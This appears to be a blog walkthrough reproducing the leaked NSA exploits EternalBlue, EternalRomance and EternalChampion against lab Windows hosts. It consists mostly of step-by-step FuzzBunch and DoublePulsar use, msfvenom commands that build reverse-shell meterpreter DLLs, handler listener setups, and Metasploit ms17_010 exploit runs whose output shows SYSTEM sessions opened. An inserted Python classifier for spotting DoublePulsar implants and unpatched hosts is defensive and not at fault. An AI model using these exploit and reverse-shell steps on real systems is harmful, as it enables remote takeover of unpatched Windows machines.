Reproducing EternalBlue, EternalRomance and EternalChampion

Ever since the Shadow Brokers leaked a large batch of NSA (US National Security Agency) hacking tools, many people have been studying how those tools are used. The best-known use is WannaCry (also called Wanna Decryptor), a worm-style ransomware that spread by means of EternalBlue from that leak. Having only ever heard how others used it, today I am going to learn by reproducing it myself.

EternalBlue

Test environment

Attacker (Windows 2003), with FuzzBunch etc. installed, IP 192.168.1.234
Target (XP), the machine being attacked, IP 192.168.1.238
Second attacker (Kali) listening on a port; the target returns its shell to this machine, IP 192.168.1.230

Setting up the environment on Windows 2003

Python 2.6: https://www.python.org/download/releases/2.6/ (remember to add it to the PATH environment variable)
PyWin32 v2.12 (pick the build that matches your attacker machine's OS): https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/
And FuzzBunch: https://github.com/misterch0c/shadowbroker
Remember to comment out line 72 in fb.py, otherwise it errors out.

In FuzzBunch.xml, change the paths in the boxed area of the figure below to the paths of the corresponding files in your attacker machine's installation directory.

Attempting the attack

Run fb.py

Set the target address to the target machine's (XP) address and the callback address to this machine's address.

Run

```
use Eternalblue
```

When it asks whether to set the variables, choose yes.

Target system (the prompt lists the systems this module can attack): this test target is XP, so choose 0. For the delivery method choose 1, "FB". Finally, when asked whether to use a pipe, keep the default.

On success it shows:

If it fails, you can run

```
execute
```

a few more times. Failing here does not matter, as long as the steps below succeed.

Generating the DLL

On Kali
Because the target XP in this environment is 32-bit, generate the DLL with the following command, then copy it to the attacker machine (Windows 2003):

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.234 LPORT=5555 -f dll >reverse.dll
```

If the target is 64-bit, use:

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.234 LPORT=5555 -f dll >reverse.dll
```

About the payload:
bind: the attacker connects to the target; usually suited to internal-network penetration testing, but sometimes blocked by a firewall.
reverse: the target connects back to the attacker; basically never blocked by a firewall.
Two bind variants for reference:

```bash
# 32-bit
msfvenom -p windows/meterpreter/bind_tcp RHOST=192.168.1.234 LPORT=5555 -f dll >bind32.dll
# 64-bit
msfvenom -p windows/x64/meterpreter/bind_tcp RHOST=192.168.1.234 LPORT=5555 -f dll >bind64.dll
```

Kali listener

```bash
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.230
lhost => 192.168.1.230
msf exploit(multi/handler) > set lport 5555
lport => 5555
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.230:5555
```

Using DoublePulsar

```
use DoublePulsar
```

For Architecture choose x32, for Function choose RunDLL, then enter the DLL path.

If it succeeds:
Attacker (Windows 2003)

Attacker (Kali)

EternalRomance

Test environment

Attacker (Windows 2003), with shadowbroker etc. installed, IP 192.168.1.234
Target (Windows 2003), the machine being attacked, IP 192.168.1.135
Second attacker (Kali) listening on a port; the target returns its shell to this machine, IP 192.168.1.230

Checking for usable exploits with Smbtouch

```
use Smbtouch
execute
```

It lists the usable exploit modules.

Generating the shellcode with DoublePulsar

```
use Doublepulsar
```

Keep pressing Enter, but note: choose *0) OutputInstall, which generates the shellcode;
the file name is shellcode.bin (any name will do).

Here you can see the systems EternalRomance can attack; quite a few Windows versions are covered.

Keep pressing Enter and shellcode.bin is generated.

Planting the DoublePulsar backdoor with EternalRomance

```
use EternalRomance
```

Accept the defaults; Pipe[] and Share[] are optional, press Enter to skip them; for Credentials choose Anonymous.

Enter the path of the file generated earlier.

Accept the defaults; execution succeeds.

The DoublePulsar backdoor has now been planted successfully and can be used.

Generating the DLL

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.234 LPORT=5555 -f dll >reverse.dll
```

Copy the generated reverse.dll to the attacker machine (Windows 2003).

Kali listener

```bash
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.230
lhost => 192.168.1.230
msf exploit(multi/handler) > set lport 5555
lport => 5555
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.230:5555
```

DoublePulsar injection

```
use Doublepulsar
```

Accept the defaults, but at Function choose 2) RunDLL and enter the location of the DLL file.

Then press Enter to the end and the exploit succeeds.
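Both the Smbtouch probe and the DoublePulsar "ping" are answered in the SMBv1 reply header, and a defender can read the same fields to spot unpatched hosts and implanted machines. As an added example (not from the original post or from the FuzzBunch tooling), the Python below parses a NetBIOS-framed SMBv1 response and classifies it the way public MS17-010/DoublePulsar scanners do: a Trans2 reply whose Multiplex ID is 0x51 indicates a DoublePulsar implant, and NT status 0xC0000205 (STATUS_INSUFF_SERVER_RESOURCES) in reply to the Trans2 probe indicates an unpatched host. The sample packets are constructed, not captured.

```python
import struct

# Fixed 32-byte SMBv1 header (little-endian) that follows the 4-byte NetBIOS session header.
SMB_HEADER = struct.Struct("<4sBIBHH8sHHHHH")
SMB_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION2 = 0x32
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205  # reply of an unpatched host to the MS17-010 Trans2 probe
DOUBLEPULSAR_MID = 0x51  # the implant answers the Trans2 SESSION_SETUP "ping" with this Multiplex ID
NORMAL_MID = 0x41        # Multiplex ID sent in the probe; a clean host echoes it unchanged


def parse_smb_header(packet: bytes) -> dict:
    """Split a NetBIOS-framed SMBv1 packet into its header fields (raises on malformed input)."""
    if len(packet) < 4 + SMB_HEADER.size or packet[0] != 0x00:
        raise ValueError("not a NetBIOS session message carrying an SMB header")
    nb_len = int.from_bytes(packet[1:4], "big")
    body = packet[4:4 + nb_len]
    if len(body) < SMB_HEADER.size:
        raise ValueError("truncated SMB header")
    (magic, command, status, flags, flags2, _pid_high, _signature,
     _reserved, tid, pid, uid, mid) = SMB_HEADER.unpack(body[:SMB_HEADER.size])
    if magic != SMB_MAGIC:
        raise ValueError("missing SMBv1 magic")
    return {"command": command, "status": status, "flags": flags, "flags2": flags2,
            "tid": tid, "pid": pid, "uid": uid, "mid": mid, "data": body[SMB_HEADER.size:]}


def classify_trans2_response(packet: bytes) -> str:
    """Classify a server reply to the MS17-010 / DoublePulsar Trans2 probes."""
    hdr = parse_smb_header(packet)
    if hdr["command"] != SMB_COM_TRANSACTION2:
        return "not-trans2"
    if hdr["mid"] == DOUBLEPULSAR_MID:      # implant-specific MID: backdoor is resident
        return "doublepulsar-implant"
    if hdr["status"] == STATUS_INSUFF_SERVER_RESOURCES:  # unpatched SMBv1 server
        return "ms17-010-unpatched"
    return "clean"


def build_smb_response(command: int, status: int, mid: int) -> bytes:
    """Constructed sample packet (not a real capture) for exercising the classifier."""
    header = SMB_HEADER.pack(SMB_MAGIC, command, status, 0x98, 0xC807, 0, b"\0" * 8,
                             0, 0x0800, 0xFEFF, 0x0800, mid)
    return b"\x00" + len(header).to_bytes(3, "big") + header


if __name__ == "__main__":
    for mid, status in ((DOUBLEPULSAR_MID, 0), (NORMAL_MID, STATUS_INSUFF_SERVER_RESOURCES), (NORMAL_MID, 0)):
        print(hex(mid), hex(status), classify_trans2_response(build_smb_response(SMB_COM_TRANSACTION2, status, mid)))
```

In practice the classifier is fed the reply to the specific probe request (Trans2 SESSION_SETUP for the implant check, Trans2 PEEK NAMED PIPE for the patch check), so only run it on responses matched to those requests.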

EternalChampion

Test environment

Attacker (Windows 2003), with FuzzBunch etc. installed, IP 192.168.1.234
Target (Windows 2008 R2), the machine being attacked, IP 192.168.1.187
Second attacker (Kali) listening on a port; the target returns its shell to this machine, IP 192.168.1.230

Tool: WinHex

Run FuzzBunch

Set targetIP to the target's IP 192.168.1.187, CallBack to this machine's IP 192.168.1.234, and do not use Redirection.

Probing with smbtouch

First use smbtouch to probe which modules can be used:

```
use smbtouch
execute
```

It shows the usable exploits.

From the figure, EternalChampion can be used.

Generating the shellcode with DoublePulsar

```
use Doublepulsar
```

The target in this test environment is 64-bit, so choose x64 for the system.

Keep pressing Enter until the 0) OutputInstall option appears, choose 0 and enter the save path; here I use c:\shellcode64.bin

Keep pressing Enter; finally shellcode.bin is generated.

Converting the shellcode to hex

Because EternalChampion takes a ShellcodeBuffer rather than a ShellcodeFile, use WinHex to convert the shellcode generated by DoublePulsar into hexadecimal; it is needed below.

Attacking with EternalChampion

```
use EternalChampion
```

Accept the defaults until shellcodeBuffer[]: paste the hexadecimal value of the shellcode64.dll generated earlier here; pasting takes a minute or two, so wait patiently.

In the figure below you can see that EternalChampion targets quite a few systems.

Then press Enter again until Mode :: Delivery mechanism, and choose FB.

After that, keep pressing Enter.

Reproduction failed
I ran execute several times and it still failed; I do not know why, and it never succeeded at this point. Never mind, let's see whether the rest works.

Generating the DLL


Copy the generated DLL to the Windows 2003 machine.

Kali listener

```bash
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.230
lhost => 192.168.1.230
msf exploit(multi/handler) > set lport 6666
lport => 6666
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.230:6666
```

Injecting the DLL with DoublePulsar

```
use DoublePulsar
```

Then at Function choose 2) Run DLL and enter the DLL file path.

Then run it, accepting the defaults; it failed here as well.
I tried many machines and none succeeded. Frustrating!

Metasploit exploit modules

Test environment

Attacker (Kali) IP 192.168.1.234
Target (Windows 2008 R2) IP 192.168.1.238

ms17_010_eternalblue

```bash
msf > search ms17_010

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/ms17_010_command 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_psexec 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf exploit(windows/smb/ms17_010_psexec) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.1.187
rhost => 192.168.1.187
msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.230
lhost => 192.168.1.230
msf exploit(windows/smb/ms17_010_eternalblue) > set lport 8888
lport => 8888
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.230:8888
[*] 192.168.1.187:445 - Connecting to target for exploitation.
[+] 192.168.1.187:445 - Connection established for exploitation.
[+] 192.168.1.187:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.187:445 - CORE raw buffer dump (51 bytes)
[*] 192.168.1.187:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.1.187:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 192.168.1.187:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
[*] 192.168.1.187:445 - 0x00000030 6b 20 31 k 1
[+] 192.168.1.187:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.187:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.187:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.187:445 - Starting non-paged pool grooming
[+] 192.168.1.187:445 - Sending SMBv2 buffers
[+] 192.168.1.187:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.187:445 - Sending final SMBv2 buffers.
[*] 192.168.1.187:445 - Sending last fragment of exploit packet!
[*] 192.168.1.187:445 - Receiving response from exploit packet
[+] 192.168.1.187:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.187:445 - Sending egg to corrupted connection.
[*] 192.168.1.187:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.1.187
[*] Meterpreter session 3 opened (192.168.1.230:8888 -> 192.168.1.187:54937) at 2018-06-01 20:11:08 -0400
[+] 192.168.1.187:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.187:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.187:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > ifconfig

Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:3c:07:87
MTU : 1500
IPv4 Address : 192.168.1.187
IPv4 Netmask : 255.255.255.0
IPv6 Address : 2001:250:6801:5501:64c3:4455:dfcc:57d1
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : 2001:250:6801:5501:ba70:f4ff:0:bea
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
IPv6 Address : fe80::64c3:4455:dfcc:57d1
IPv6 Netmask : ffff:ffff:ffff:ffff::
```

ms17_010_psexec



```bash
msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > set rhost 192.168.1.187
rhost => 192.168.1.187
msf exploit(windows/smb/ms17_010_psexec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_psexec) > set lhost 192.168.1.230
lhost => 192.168.1.230
msf exploit(windows/smb/ms17_010_psexec) > set lport 7777
lport => 7777
msf exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 192.168.1.230:7777
[*] 192.168.1.187:445 - Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.1.187:445 - Built a write-what-where primitive...
[+] 192.168.1.187:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.1.187:445 - Selecting PowerShell target
[*] 192.168.1.187:445 - Executing the payload...
[+] 192.168.1.187:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (206403 bytes) to 192.168.1.187
[*] Meterpreter session 2 opened (192.168.1.230:7777 -> 192.168.1.187:54873) at 2018-06-01 20:04:07 -0400

meterpreter > ifconfig

Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:3c:07:87
MTU : 1500
IPv4 Address : 192.168.1.187
IPv4 Netmask : 255.255.255.0
IPv6 Address : 2001:250:6801:5501:64c3:4455:dfcc:57d1
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : 2001:250:6801:5501:ba70:f4ff:0:bea
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
IPv6 Address : fe80::64c3:4455:dfcc:57d1
IPv6 Netmask : ffff:ffff:ffff:ffff::
```

This post mainly records the operational steps, with little analysis of the underlying ideas; for a closer look, see the reference articles below.

References

EternalBlue references:
http://www.freebuf.com/articles/system/133853.html
https://www.bennythink.com/shadowbroker.html
EternalRomance reference:
http://www.freebuf.com/articles/system/132879.html
EternalChampion reference:
https://www.bennythink.com/eternalchampion.html
Introduction to ms17_010_psexec:
https://github.com/rapid7/metasploit-framework/pull/9473
